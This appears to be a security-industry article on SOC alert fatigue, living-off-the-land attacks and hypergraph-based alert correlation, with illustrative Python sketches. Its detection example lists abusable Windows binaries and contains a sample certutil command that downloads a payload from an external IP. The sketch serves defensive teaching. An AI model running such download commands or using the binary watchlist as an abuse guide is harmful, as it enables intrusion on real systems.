Alert fatigue is a real threat to the Security Operations Centre (SOC). The sheer volume of false positives quickly desensitises analysts and makes it harder for them to prioritise their responses.
Automation was supposed to resolve the issue. In reality, however, it has failed to correlate alerts or improve analysts' ability to respond to threats. The result is 'swivel chair' operations, with analysts required to log in to, monitor and manage numerous dashboards. Consequently, burnout is at critical levels: a troubling 63% of security professionals reported an increase in stress levels, according to a 2023 report. The effect is exacerbated by a skills shortage in the sector that has grown 19% over the past year and, according to ISC2, now stands at 4.8 million globally.
It’s a situation further complicated by the way attacks have evolved. In a bid to remain undetected, attackers utilise the tools and functionality already built into systems. Living off the Land (LotL) attacks, for instance, harness native binaries, scripts and libraries to advance an attack within the environment without the need to deploy additional tooling.
In fact, the LOLBAS Project has now documented over 200 binaries, scripts and libraries that can be abused in this way on the Windows operating system. From a threat detection point of view, this makes attacks significantly more difficult to spot. Security solutions have to be tuned to look for the minutest deviations from what is considered ‘normal’ network behaviour, resulting in many more false positive alerts. The sketch below makes the trade-off concrete.
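Here is a minimal, illustrative sketch in Python of the kind of rule defenders end up writing: it flags a LOLBAS-listed binary only when it is paired with suspicious arguments. The watchlist, argument patterns and sample event are assumptions for illustration, not a production detection.

```python
# Minimal sketch: flag a process event only when a LOLBAS-listed binary
# appears alongside arguments that suggest abuse. All values here are
# illustrative assumptions, not real telemetry or a production rule.

LOLBAS_WATCHLIST = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# Command-line fragments that commonly indicate abuse of legitimate binaries.
SUSPICIOUS_ARGS = ("-urlcache", "http://", "https://", "scrobj.dll")

def is_suspicious(event: dict) -> bool:
    """True if a watchlisted binary is paired with a risky command line."""
    binary = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event.get("cmdline", "").lower()
    return binary in LOLBAS_WATCHLIST and any(s in cmdline for s in SUSPICIOUS_ARGS)

# Hypothetical event: certutil.exe being used as a downloader.
event = {
    "image": r"C:\Windows\System32\certutil.exe",
    "cmdline": "certutil -urlcache -split -f http://203.0.113.7/payload.bin",
}
print(is_suspicious(event))  # True
```

The weakness is obvious: administrators legitimately use these same binaries, so every loosening of the suspicious-argument list trades missed attacks for yet more false positives.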
Using graphs to grapple with alerts
In short, detection is becoming far more subtle and complex, and the human and computing resources we have are struggling to keep pace. Generative AI has been lauded as a possible solution. However, as in other sectors accused of AI-washing, vendors have been sketchy when it comes to the details of how the technology could help. Simply creating an AI chatbot will not add value; instead, we need to look again at how we’re approaching the problem and at how Artificial Intelligence (AI), in its original sense, could add value.
For the analyst, attempting to work out whether an alert is indicative of an attack is comparable to examining a display one pixel at a time while trying to make out the full image. That’s because alert events need to be correlated with other contextual information, such as the endpoint and identity involved, as well as threat intelligence on known threats. A sketch of that enrichment step follows.
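As a minimal sketch of the enrichment step, assuming hypothetical lookup sources (a CMDB for assets, an identity provider, a threat-intelligence feed), correlation might start by joining each alert to its context:

```python
# Illustrative sketch: join one alert to the context an analyst would
# otherwise gather by hand. The lookup sources and field names are
# hypothetical placeholders for whatever a given SOC actually has.

from dataclasses import dataclass, field

@dataclass
class EnrichedAlert:
    alert_id: str
    raw: dict
    endpoint: dict = field(default_factory=dict)      # asset criticality, owner, OS
    identity: dict = field(default_factory=dict)      # user, privileges, recent logins
    threat_intel: dict = field(default_factory=dict)  # matches against known-bad indicators

def enrich(alert: dict, cmdb: dict, idp: dict, ti: dict) -> EnrichedAlert:
    """Correlate a raw alert with endpoint, identity and threat-intel context."""
    return EnrichedAlert(
        alert_id=alert["id"],
        raw=alert,
        endpoint=cmdb.get(alert["host"], {}),
        identity=idp.get(alert["user"], {}),
        threat_intel=ti.get(alert.get("indicator"), {}),
    )
```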
Correlation is best achieved using graphs, which allow those additional pieces of information to be factored in. Hypergraphs could be a game changer here because they allow numerous parameters to be considered and applied to a single event, in effect creating not two but multiple axes along which to model the threat. The events that make up the resulting chains of detection can then be scored to determine whether they warrant investigation, as the sketch below illustrates.
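A minimal sketch of the idea, with made-up events and a deliberately naive scoring function: each hyperedge links every event that shares an entity (a host, a user), not just pairs of events, so a whole chain can be scored at once.

```python
# Sketch of hypergraph-style correlation: one hyperedge per shared entity
# value, spanning any number of events. The events, scoring and threshold
# are illustrative assumptions, not a published method.

from collections import defaultdict

EVENTS = [
    {"id": "e1", "host": "ws-042", "user": "alice", "score": 0.2},
    {"id": "e2", "host": "ws-042", "user": "alice", "score": 0.3},
    {"id": "e3", "host": "srv-db", "user": "alice", "score": 0.4},
]

def build_hyperedges(events, keys=("host", "user")):
    """Group event IDs into hyperedges keyed by each shared entity value."""
    edges = defaultdict(set)
    for ev in events:
        for key in keys:
            edges[(key, ev[key])].add(ev["id"])
    return edges

def chain_score(member_ids, events):
    """Naive chain score: sum of member event scores (illustrative only)."""
    by_id = {ev["id"]: ev for ev in events}
    return sum(by_id[i]["score"] for i in member_ids)

edges = build_hyperedges(EVENTS)
for (key, value), members in edges.items():
    if len(members) > 1:  # a chain worth scoring
        print(key, value, sorted(members), round(chain_score(members, EVENTS), 2))
# The 'alice' hyperedge links e1, e2 and e3 across both hosts -> score 0.9,
# even though no single event would merit investigation on its own.
```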
AI answers to the analyst
Once we have enough of these chains of detection, it becomes possible to use AI’s deductive algorithms to analyse the information. Gartner defines AI as applying advanced analysis and logic-based techniques, including machine learning, to interpret events, support and automate decisions, and take actions. This means we can train it to interpret the information and present it to the analyst in a digestible format. And, using Generative AI, the analyst can then prompt for further details, along the lines of the sketch below.
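As a sketch of what that hand-off might look like, assuming a scored chain in the shape produced above, the system could assemble a structured prompt for whichever generative model sits behind the analyst’s console. The chain fields are assumptions, and the model call itself is left abstract here.

```python
# Sketch: turn a scored detection chain into a structured prompt so a
# generative model can summarise it for the analyst. Field names and the
# sample chain are hypothetical; any LLM client could consume the prompt.

def build_prompt(chain: dict) -> str:
    events = "\n".join(
        f"- {e['time']} {e['host']} {e['user']}: {e['action']}" for e in chain["events"]
    )
    return (
        "You are assisting a SOC analyst. Summarise the following correlated "
        f"detection chain (score {chain['score']}) in three sentences, then "
        "list the most likely attack technique and a recommended next step.\n"
        f"{events}"
    )

chain = {
    "score": 0.9,
    "events": [
        {"time": "09:02", "host": "ws-042", "user": "alice",
         "action": "certutil download from external host"},
        {"time": "09:05", "host": "ws-042", "user": "alice",
         "action": "rundll32 loading unsigned DLL"},
        {"time": "09:11", "host": "srv-db", "user": "alice",
         "action": "first-ever interactive login"},
    ],
}
print(build_prompt(chain))
```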
Looking to the future, we’re now entering the age of agentic AI, in which the technology becomes more autonomous and better equipped to make decisions. It’s unlikely that detection will become fully automated in this way, but we could see analysts presented with possible impact scenarios and avenues for effective remediation by an AI “coworker”.
In the meantime, hypergraphs promise to significantly reduce the number of false positives being generated. Lab tests have shown the approach can cut those numbers by up to 90%, freeing analysts to focus their efforts on the more rewarding aspects of the job: threat hunting, investigation and response.
